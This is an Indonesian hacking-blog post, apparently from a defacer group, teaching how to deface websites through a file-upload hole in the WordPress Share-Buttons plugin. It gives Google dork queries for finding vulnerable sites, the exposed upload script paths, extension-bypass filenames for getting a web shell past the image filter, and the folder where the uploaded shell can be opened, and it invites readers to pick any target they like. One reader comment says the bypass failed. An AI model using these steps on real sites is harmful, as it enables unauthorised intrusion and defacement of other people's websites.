Deface Metode WordPress Share-Buttons Plugins Shell Upload

Deface Metode WordPress Share-Buttons Plugins Shell Upload

Garudasecurityhacker.id - Selamat malam para sobat defacer dimanapun kalian berada di postingan kali ini saya "Esevenb" ingin membagikan exploit  Share-Buttons Plugins Shell Upload.

Langsung saja ke tutorialnya, berikut bahan bahan untuk metode ini 
Google Dork
inurl:''/wp-content/plugins/share-buttons/''
intext:''Sleeker More "Web 2.0" onChange Use''
Kalian pastekan Google Dorknya ke google

Jika sudah silakan pilih targetnya sesuai keinginan dan langsung masukan exploit
Exploit
/wp-content/plugins/share-buttons/upload/index.php
/wp-content/plugins/share-buttons/upload/scripts/ajaxupload.php
jika vuln maka akan muncul seperti gambar di bawah ini

Silakan upload shellnya, disana ada file yang bisa di upload ".gif .jpg .png"
Bypass Shell.php;.gif ~ .asp;.png ~ .shtml.fla;.jpeg

Jika sudah di upload selanjutnya tinggal akses lokasi file yang telah terupload,
Akses File/wp-content/plugins/share-buttons/upload/uploads/

Sekian dulu tutorialnya jangan lupa share dan bagikan.
kunjungi juga fanspage kami : https://facebook.com/gshrealpage

1 komentar

  1. gabisa bypass gayn,
    Error in Upload, check settings and path info in source code

    BalasHapus


EmoticonEmoticon